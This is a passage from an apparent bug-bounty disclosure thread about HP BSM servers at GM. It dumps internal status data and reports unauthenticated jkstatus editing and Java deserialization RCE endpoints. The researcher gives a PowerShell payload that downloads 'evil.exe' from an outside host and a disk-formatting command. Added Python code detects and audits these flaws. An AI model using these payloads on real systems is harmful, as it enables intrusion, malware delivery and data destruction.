  551. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  552. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
  553. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
  554. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
  555. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  556. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
  557. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  558. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  559. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
  560. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  561. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  562. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
  563. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  564. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
  565. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
  566. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
  567. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
  568. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
  569. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
  570. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
  571. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
  572. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
  573. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
  574. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console Exact uriworkermap -1 0 0 - - - - 0
  575. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web Exact uriworkermap -1 0 0 - - - - 0
  576. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite Exact uriworkermap -1 0 0 - - - - 0
  577. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm Exact uriworkermap -1 0 0 - - - - 0
  578. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
  579. [S|E|R] Worker Status for wdeWorker
  580.  
  581. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  582. ajp13 127.0.0.1 127.0.0.1:8010 0 0 0 0 2 0
  583.  
  584. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  585. OK 133834 (0/sec) 0 0 0 2.2P (9.2G/sec) 5.1T (21M/sec) 0 6 25 254433
  586. URI Mappings for wdeWorker (22 maps) [Hide]
  587.  
  588. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  589. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
  590. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
  591. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  592. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  593. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
  594. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
  595. internalsubsomain.was.here.gm.com:80 /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  596. internalsubsomain.was.here.gm.com:80 /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
  597. internalsubsomain.was.here.gm.com:80 /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
  598. internalsubsomain.was.here.gm.com:80 /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
  599. internalsubsomain.was.here.gm.com:80 /axis2 Exact uriworkermap -1 0 0 - - - - 0
  600. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
  601. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
  602. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  603. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
  604. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
  605. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
  606. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  607. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
  608. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
  609. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
  610. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2 Exact uriworkermap -1 0 0 - - - - 0
  611. [S|E|R] Worker Status for tvWorker
  612.  
  613. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  614. ajp13 127.0.0.1 127.0.0.1:21002 0 0 0 0 2 0
  615.  
  616. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  617. OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 0 254430
  618. URI Mappings for tvWorker (2 maps) [Hide]
  619.  
  620. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  621. internalsubsomain.was.here.gm.com:80 /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
  622. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
  623. [S|E|R] Worker Status for odbWorker
  624.  
  625. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  626. ajp13 127.0.0.1 127.0.0.1:21215 0 0 0 0 2 0
  627.  
  628. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  629. OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 2 254426
  630. URI Mappings for odbWorker (4 maps) [Hide]
  631.  
  632. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  633. internalsubsomain.was.here.gm.com:80 /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
  634. internalsubsomain.was.here.gm.com:80 /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
  635. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
  636. internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
  637. Legend [Hide]
  638.  
  639. Name Worker name
  640. Type Worker type
  641. Route Worker route
  642. Act Worker activation configuration
  643. ACT=Active, DIS=Disabled, STP=Stopped
  644. State Worker error status
  645. OK=OK, ERR=Error with substates
  646. IDLE=No requests handled, BUSY=All connections busy,
  647. REC=Recovering, PRB=Probing, FRC=Forced Recovery
  648. D Worker distance
  649. F Load Balancer factor
  650. M Load Balancer multiplicity
  651. V Load Balancer value
  652. Acc Number of requests
  653. Sess Number of sessions created
  654. Err Number of failed requests
  655. CE Number of client errors
  656. RE Number of reply timeouts (decayed)
  657. Wr Number of bytes transferred
  658. Rd Number of bytes read
  659. Busy Current number of busy connections
  660. Max Maximum number of busy connections
  661. Con Current number of backend connections
  662. RR Route redirect
  663. Cd Cluster domain
  664. Rs Recovery scheduled in app. min/max seconds
  665. LR Seconds since last reset of statistics counters
  666. LE Timestamp of the last error
  667. JK Status Manager Start Page
  668.  
  669. Copyright © 1999-2014, The Apache Software Foundation
  670. Licensed under the Apache License, Version 2.0.
  671.  
  672. ---
  673.  
  674. 2017-03-11 08:20:18 +0000: @cayce (comment)
  675. /jkstatus?cmd=dump
  676.  
  677. Exposes the webserver root directory as well as internal service ports:
  678.  
  679. JK Status Manager for vulnerable.host.gm.com:443
  680.  
  681. Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 03:15:08 Eastern Standard Time
  682. JK Version: mod_jk/1.2.40 Unix Seconds: 1489220108
  683. Change format
  684. [Back to worker list]
  685. Configuration Data
  686.  
  687. This dump does not include any changes applied by the status worker to the configuration after the initial startup
  688. ServerRoot=E:/HPBSM/WebServer
  689. ps=\
  690. worker.list=localAjp, wdeWorker, tvWorker, odbWorker, JKStatus
  691. worker.localAjp.type=ajp13
  692. worker.localAjp.port=8009
  693. worker.localAjp.host=127.0.0.1
  694. worker.localAjp.connection_pool_size=200
  695. worker.wdeWorker.type=ajp13
  696. worker.wdeWorker.port=8010
  697. worker.wdeWorker.host=127.0.0.1
  698. worker.wdeWorker.connection_pool_size=120
  699. worker.odbWorker.type=ajp13
  700. worker.odbWorker.port=21215
  701. worker.odbWorker.host=127.0.0.1
  702. worker.odbWorker.connection_pool_size=120
  703. worker.tvWorker.type=ajp13
  704. worker.tvWorker.port=21002
  705. worker.tvWorker.host=127.0.0.1
  706. worker.tvWorker.connection_pool_size=25
  707. worker.JKStatus.type=status
  708. JK Status Manager Start Page
  709.  
  710. Copyright © 1999-2014, The Apache Software Foundation
  711. Licensed under the Apache License, Version 2.0.
  712.  
  713. ---
  714.  
  715. 2017-03-11 08:28:05 +0000: @cayce (comment)
  716. This "status" page is a gold mine ... allowing trusted users unauthenticated access to EDIT system configuration of "Big Data", nice!
  717.  
  718. /jkstatus?cmd=edit&from=show&w=localAjp
  719.  
  720. JK Status Manager for vulnerable.host.gm.com:443
  721.  
  722. [Back to worker view]
  723. Edit worker settings for localAjp
  724.  
  725. Hostname:
  726. 127.0.0.1
  727. Port:
  728. 8009
  729. Connection Pool Timeout:
  730. 0
  731. Ping Timeout:
  732. 10000
  733. Connect Timeout:
  734. 0
  735. Prepost Timeout:
  736. 0
  737. Reply Timeout:
  738. 0
  739. Retries:
  740. 2
  741. Retry Interval:
  742. 100
  743. Connection Ping Interval:
  744. 0
  745. Recovery Options:
  746. 0
  747. Max Packet Size:
  748. 8192
  749.  
  750. Update Worker
  751. JK Status Manager Start Page
  752.  
  753. Copyright © 1999-2014, The Apache Software Foundation
  754. Licensed under the Apache License, Version 2.0.
  755.  
  756. *******
  757. /jkstatus?cmd=reset&from=show&w=localAjp
  758. Is also available, but I don't want to 'reset' without permission.
  759.  
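Detection logic for the exposed mod_jk status worker shown in the comments above, as an added example that is not part of the report: it parses Apache combined-format access log lines and flags /jkstatus requests from non-admin sources, rating cmd=edit/update/reset (which change the live worker configuration) above cmd=show/dump. The admin address ranges and the log lines are constructed.

```python
"""Flag /jkstatus requests from outside the admin networks and rank them by
whether the command mutates (edit/update/reset) or only discloses (show/dump)
worker configuration. Added example, not from the report; the admin ranges
and the Apache combined-format log lines below are constructed."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Sources allowed to reach the status worker (constructed ranges)
ADMIN_NETS = [ipaddress.ip_network("127.0.0.0/8"),
              ipaddress.ip_network("10.9.0.0/24")]
# Status-worker commands seen in the thread, split by effect
MUTATING_CMDS = {"edit", "update", "reset"}
DISCLOSING_CMDS = {"show", "dump"}

# Apache combined log: ip ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')


def classify_request(ip, path):
    """Return (severity, cmd) for a /jkstatus request from a non-admin
    source, or None when the request is not of interest."""
    parts = urlsplit(path)
    if parts.path.rstrip("/") != "/jkstatus":
        return None
    if any(ipaddress.ip_address(ip) in net for net in ADMIN_NETS):
        return None
    cmd = parse_qs(parts.query).get("cmd", ["(none)"])[0]
    if cmd in MUTATING_CMDS:
        return ("high", cmd)
    if cmd in DISCLOSING_CMDS:
        return ("medium", cmd)
    return ("low", cmd)


def scan_access_log(lines):
    """Parse log lines and return alerts as (ts, ip, severity, cmd, status)."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than abort the scan
        hit = classify_request(m["ip"], m["path"])
        if hit:
            alerts.append((m["ts"], m["ip"], hit[0], hit[1], int(m["status"])))
    return alerts


# Constructed sample lines mirroring the requests quoted in the thread
SAMPLE_ACCESS_LOG = [
    '127.0.0.1 - - [11/Mar/2017:03:14:00 -0500] "GET /jkstatus HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Mar/2017:03:15:08 -0500] "GET /jkstatus?cmd=dump HTTP/1.1" 200 2211',
    '203.0.113.5 - - [11/Mar/2017:03:28:05 -0500] "GET /jkstatus?cmd=edit&from=show&w=localAjp HTTP/1.1" 200 3300',
    '203.0.113.5 - - [11/Mar/2017:03:29:00 -0500] "GET /topaz/login.jsp HTTP/1.1" 200 900',
    'not a log line',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG):
        print(alert)
```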
  760. ---
  761.  
  762. 2017-03-11 08:38:16 +0000: @cayce (comment)
  763. I just received a 500 when attempting to access status. Are you performing defensive measures? If so, please advise accepted status.
  764.  
  765. FYI, if firewalling a single IP is the approach ... new IP gives me 200 just fine ; )
  766.  
  767. ---
  768.  
  769. 2017-03-11 09:12:08 +0000: @cayce (comment)
  770. Additional servlet endpoints identified as unauthed remote RCE exploitable:
  771. (See initial report, PoCs and additional information references)
  772.  
  773. /topaz/authorizationcontrol
  774. /topaz/authorizationmanagment
  775.  
  776. ---
  777.  
  778. 2017-03-11 09:49:12 +0000: @cayce (comment)
  779. I'm seeing some new behavior with this server.
  780.  
  781. I see the implementation of "WWW-Authenticate: Basic realm="HP BSM"" on the server side which I don't recall logging previously.
  782.  
  783. Either way, while making the GET unserialized (browser/proxy/script), I do receive the expected "401 Unauthorized". However, while sending serialized payloads, I receive "500 Internal Server Error"; the server is still processing the request despite lacking auth. Seems the "WWW-Authenticate" measure is not applied.
  784.  
  785. ---
  786.  
  787. 2017-03-11 18:09:13 +0000: @cubo (comment)
  788. Thank you for the additional information. We have validated the jkstatus information disclosure. We are working on validating the RCE component. When you built the payload did you use the groovy serialization payload option for all of the POCs?
  789.  
  790. ---
  791.  
  792. 2017-03-11 18:24:13 +0000: @cayce (comment)
  793. Yeah, groovy gadgets seem to be getting it done, but there are likely other Java serialization attacks.
  794.  
  795. I recommend searching the entire system for java ".jar" files, unpack (change extension to zip, unzip) and then grep through them for "new ObjectInputStream".
  796.  
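One way to carry out the audit suggested above, as an added example that is not part of the report: walk an install tree, open every jar/war/ear (including archives nested inside wars), and byte-search each class entry for the constant-pool reference to java/io/ObjectInputStream, noting whether the same class also references the JEP 290 ObjectInputFilter. The archives it scans are constructed stand-ins, not HP BSM files.

```python
"""Audit an install tree for Java classes that deserialize input, following
the "grep the jars for new ObjectInputStream" advice. Added example, not
part of the report; the archives it scans are constructed.

A compiled .class file lists every class it references as a modified-UTF8
constant such as "java/io/ObjectInputStream", so a byte search inside each
class entry finds the callers without decompiling anything."""
import io
import os
import tempfile
import zipfile

DESER_MARKER = b"java/io/ObjectInputStream"   # native Java deserialization
FILTER_MARKER = b"java/io/ObjectInputFilter"  # JEP 290 look-ahead filter in use


def scan_jar(jar):
    """Return [(class_entry, references_filter)] for every class in the jar
    (path or file-like) that references ObjectInputStream; nested
    jars/wars are scanned in memory and their entries prefixed "outer!"."""
    findings = []
    with zipfile.ZipFile(jar) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                data = zf.read(name)
                if DESER_MARKER in data:
                    findings.append((name, FILTER_MARKER in data))
            elif name.endswith((".jar", ".war", ".ear")):
                for cls, filt in scan_jar(io.BytesIO(zf.read(name))):
                    findings.append((f"{name}!{cls}", filt))
    return findings


def scan_tree(root):
    """Walk root and map each archive (path relative to root) to findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                hits = scan_jar(path)
            except zipfile.BadZipFile:
                continue  # not a real archive; skip rather than abort the audit
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def _fake_class(*referenced):
    """Constructed stand-in for a .class file: the magic number plus the class
    names this byte search looks for (not real bytecode)."""
    return b"\xca\xfe\xba\xbe" + b"\x00".join(referenced)


def build_sample_tree():
    """Create a temp directory with three constructed archives; return it."""
    root = tempfile.mkdtemp(prefix="jarscan_")
    # a servlet that deserializes request bodies with no filter
    with zipfile.ZipFile(os.path.join(root, "remoteproxy.jar"), "w") as zf:
        zf.writestr("com/example/RemoteProxyServlet.class",
                    _fake_class(b"javax/servlet/http/HttpServlet", DESER_MARKER))
        zf.writestr("com/example/Util.class", _fake_class(b"java/lang/String"))
    # a reader that deserializes but also wires up ObjectInputFilter
    with zipfile.ZipFile(os.path.join(root, "filtered.jar"), "w") as zf:
        zf.writestr("com/example/SafeReader.class",
                    _fake_class(DESER_MARKER, FILTER_MARKER))
    # a war bundling the first jar under WEB-INF/lib, plus an unrelated file
    with open(os.path.join(root, "remoteproxy.jar"), "rb") as f:
        inner = f.read()
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/remoteproxy.jar", inner)
        war.writestr("WEB-INF/web.xml", "<web-app/>")
    return root


if __name__ == "__main__":
    for archive, hits in sorted(scan_tree(build_sample_tree()).items()):
        for cls, filtered in hits:
            print(f"{archive}: {cls} [{'filtered' if filtered else 'UNFILTERED'}]")
```

Every unfiltered hit is a candidate for either removing the deserialization path or wrapping it with a class-allowlist filter; point the scanner at the real install root instead of the sample tree.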
  797. ---
  798.  
  799. 2017-03-11 19:01:14 +0000: @cayce (comment)
  800. Access to powershell seems unrestricted; this is hardening 101 for modern Windows systems. It really ought not be available, but since it is, I recommend using it to do your bidding on/from this host.
  801.  
  802.  
  803.  
  804. ---
  805.  
  806. 2017-03-12 02:52:58 +0000: @cayce (comment)
  807. Re: "We have validated the jkstatus information disclosure."
  808. 3) Out of Scope
  809. Missing best practices, information disclosures, use of a known-vulnerable libraries or descriptive / verbose / unique error pages (without substantive information indicating exploitability)
  810.  
  811. I'd like to clarify this point. More specifically, my notes tie this endpoint's disclosure directly to the discovery of the additional endpoints /topaz/authorizationcontrol and /topaz/authorizationmanagment. It's important for your team to distinguish between a purely informational disclosure with no impact ("Apache/IIS" disclosure) versus disclosure that has significant impact, especially that of additional vectors. The impact of these "lows" ought to be felt and understood more clearly while in the light of the final attack vectors during the course of your incident response lessons learned meetings.
  812.  
  813. Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
  814.  
  815. ---
  816.  
  817. 2017-03-12 08:11:25 +0000: @cubo (comment)
  818. We have evaluated your submission and validated the vulnerability that you’ve reported. We are investigating next steps. Thanks again for your submission and for providing proper details.
  819.  
  820. ---
  821.  
  822. 2017-03-12 09:10:44 +0000: @cayce (comment)
  823. I would like to know who will be handling disclosure/bounty with HPE. They claim to have had a bounty program in the past, but I can't find any evidence of its activities currently. I've tried to reach out to support@hackerone.com for several days now, but have been completely ignored without response.
  824.  
  825. ---
  826.  
  827. 2017-03-12 09:18:53 +0000: @cayce (comment)
  828. Re: "We have evaluated your submission and validated the vulnerability that you’ve reported"
  829. Would you please be more explicit about what has been validated? I have reported many vulnerabilities and several exploits.
  830.  
  831. Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
  832.  
  833. /tvb/remoteProxy
  834. /bpi/remoteProxy
  835. /topaz/authorizationcontrol
  836. /topaz/authorizationmanagment
  837.  
  838. ---
  839.  
  840. 2017-03-12 17:43:41 +0000: @cayce (comment)
  841. I've identified the following endpoints providing unauthenticated, remote access.
  842. /topaz/download
  843. /topaz/upload
  844.  
  845. Would your team validate or approve fuzzing?
  846.  
  847. ---
  848.  
  849. 2017-03-12 18:13:07 +0000: @cayce (comment)
  850. Additional Java deserialization RCE endpoint:
  851. /topaz/remoteProxy
  852.  
  853. ---
  854.  
  855. 2017-03-13 01:20:00 +0000: @cubo (comment)
  856. You have mentioned being able to execute powershell. Do you have a POC for powershell execution through the serialization vector?
  857.  
  858. ---
  859.  
  860. 2017-03-13 02:24:17 +0000: @cayce (comment)
  861. OK, based on this question, your gadgets must be working, yes? If so, please confirm your findings so that I can better assist your team with this investigation.
  862.  
  863. Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
  864.  
  865. /tvb/remoteProxy
  866. /bpi/remoteProxy
  867. /topaz/authorizationcontrol
  868. /topaz/authorizationmanagment
  869.  
  870. Yes or No?
  871.  
  872. Additionally, we are well past the 24 hour point relevant toward a critical exposure of internal assets. I find the absence of response to my queries a bit disappointing to say the least. Are we working together on this or against each other?
  873.  
  874. Please respond to the aforementioned requests ASAP so I can continue to help secure your application better than the vendor that sold it to you.
  875. 1: Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
  876. (now three)
  877.  
  878. 2: I've identified the following endpoints providing unauthenticated, remote access.
  879. /topaz/download
  880. /topaz/upload
  881.  
  882. Will your team validate or approve fuzzing?
  883.  
  884. 3: Additional Java deserialization RCE endpoint:
  885. /topaz/remoteProxy
  886.  
  887.  
  888. I've attached a simple PoC using powershell. For a quick roundup of modern powershell abuse techniques, please review anything by harmj0y et al. as well as this blog post by MS:
  889. https://blogs.msdn.microsoft.com/powershell/2016/09/27/powershell-security-at-derbycon
  890.  
  891. ---
  892.  
  893. 2017-03-13 02:53:01 +0000: @cayce (comment)
  894. Here is a better one.
  895.  
  896. ---
  897.  
  898. 2017-03-13 04:54:39 +0000: @cayce (comment)
  899. I'm seeing activity from the following nodes:
  900. 173.194.93.9
  901. 74.125.41.8
  902.  
  903. Would you please confirm that these are associated with your investigation and not unknown actors?
  904.  
  905. ---
  906.  
  907. 2017-03-13 18:12:53 +0000: @cubo (comment)
  908. We are actively working through the validation process to ensure we capture the root-cause of the issue. That said, we need additional information. Please provide video evidence of successful payload execution and the http response you are receiving when executing to ensure we have everything we need.
  909. Again, thank you for your patience as we work through this issue. We prioritize all findings based on their criticality and work to resolve them in a timely manner. Stay tuned for updates.
  910.  
  911.  
  912. ---
  913.  
  914. 2017-03-14 22:50:00 +0000: @cayce (hacker requested mediation)
  915. I don't know where to begin here ...
  916.  
  917. The biggest issue for me is disclosure to the vendor (if the program participant hasn't already). I was under the impression that this is part of the H1 service. Aside from likely getting screwed out of CVEs and any potential bounty cash from the vendor because I was mistaken about the role H1 plays in the responsible disclosure cycle, myself and an unknown number of users (FTE/Contract/Freelance) working on behalf of the program participant are privy to the presence of multiple pre-auth RCEs. It's been five days; these users could be leveraging these exploits to their own advantage.
  918.  
  919. I signed up to H1 to deliver high quality findings as well as reports. This is difficult to do without some teamwork.
  920.  
  921. Program Participant:
  922. The client has ignored most if not all of my requests. They are now asking for video evidence of findings I've not made. I'm quite sure they are confused about something and not sure how to validate what has been reported. Furthermore just now after a quick test, it looks as though they are applying fixes without acceptance of reported vulnerabilities and associated exploits. Is it acceptable that program participants are able to stall while making changes without crediting the researcher?
  923.  
  924. H1:
  925. It's been almost a week already (I sent initial request 3/10, received actual response from Adam Bacchus (adambacchus) with little to no useful information). I've responded a few times to that e-mail (a couple one-liners out of frustrated haste, apologies about that) and I've not gotten much response at all from anyone at H1. I'm hopeful that there is diligent work happening behind the scenes with the vendor? I've read many positive reviews about H1's integrity; I'm hoping I won't be an exception.
  926.  
  927. best,
  928. cayce
  929.  
  930. ---
  931.  
  932. 2017-03-15 02:28:18 +0000: @cayce (comment)
  933. What is it that your team doesn't understand how to validate?
  934.  
  935. I was going to attach another PoC, but it looks as though your team is already applying remediation measures before assigning credit. While this is left unclear, I'm not highly motivated to continue testing if the testing environment has changed without notification. If this isn't communicated to your tester, they will likely waste a lot of their time as well as that of your team, unnecessarily.
  936.  
  937. Output from a listener:
  938.  
  939. The Collaborator server received a DNS lookup of type A for the domain name randomaddress.burpcollaborator.net.
  940. The lookup was received from IP address 198.208.47.21 at 2017-Mar-14 19:57:25 UTC.
  941.  
  942. Output from whois says it's GM:
  943.  
  944. $ whois 198.208.47.21
  945.  
  946. #
  947. # ARIN WHOIS data and services are subject to the Terms of Use
  948. # available at: https://www.arin.net/whois_tou.html
  949. #
  950. # If you see inaccuracies in the results, please report at
  951. # https://www.arin.net/public/whoisinaccuracy/index.xhtml
  952. #
  953.  
  954.  
  955. #
  956. # Query terms are ambiguous. The query is assumed to be:
  957. # "n 198.208.47.21"
  958. #
  959. # Use "?" to get help.
  960. #
  961.  
  962. #
  963. # The following results may also be obtained via:
  964. # https://whois.arin.net/rest/nets;q=198.208.47.21?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
  965. #
  966.  
  967. NetRange: 198.208.0.0 - 198.208.255.255
  968. CIDR: 198.208.0.0/16
  969. NetName: GM-198-208-C
  970. NetHandle: NET-198-208-0-0-1
  971. Parent: NET198 (NET-198-0-0-0-0)
  972. NetType: Direct Assignment
  973. OriginAS: AS30383
  974. Organization: General Motors LLC (GMED)
  975. RegDate: 1993-06-29
  976. Updated: 2016-06-14
  977. Ref: https://whois.arin.net/rest/net/NET-198-208-0-0-1
  978.  
  979.  
  980. OrgName: General Motors LLC
  981. OrgId: GMED
  982. Address: 200 Renaissance Center
  983. City: Detroit
  984. StateProv: MI
  985. PostalCode: 48265
  986. Country: US
  987. RegDate: 1990-11-16
  988. Updated: 2016-06-29
  989. Ref: https://whois.arin.net/rest/org/GMED
  990.  
  1020.  
  1021. This is a good enough indicator that some or all of the payload was executed on GM's system.
  1022.  
  1023. Your team can confirm this with your own host and a gadget using a payload such as:
  1024. powershell.exe -Command "& {wget 'https://spooky.driveby.mom' -OutFile '%TEMP%\evil.exe'}"
  1025. (If this doesn't work for you, you can try several variations depending upon your powershell version. During my testing many of the modern commandlets returned positive results, but your team could just ask the admin or do some host analysis and make an educated guess as to the powershell version.)
  1026.  
  1027. While sniffing traffic on spooky.driveby.mom, you will see your desired traffic/"callback"/beacon.
  1028.  
  1029. Since your team has or is able to attain authorized access to this node, why not just review the system logs for record of execution?
  1030.  
  1031. Would your team test the following payload in a groovy gadget against a DISPOSABLE system?
  1032.  
  1033. ***** ... WARNING ... *****
  1034. DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
  1035. ***** ... WARNING ... *****
  1036.  
  1037. powershell.exe -Command "Get-Partition -DiskNumber 1 -PartitionNumber 1 | Format-Volume -Force -FileSystem NTFS"
  1038.  
  1039. ***** ... WARNING ... *****
  1040. DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
  1041. ***** ... WARNING ... *****
  1042.  
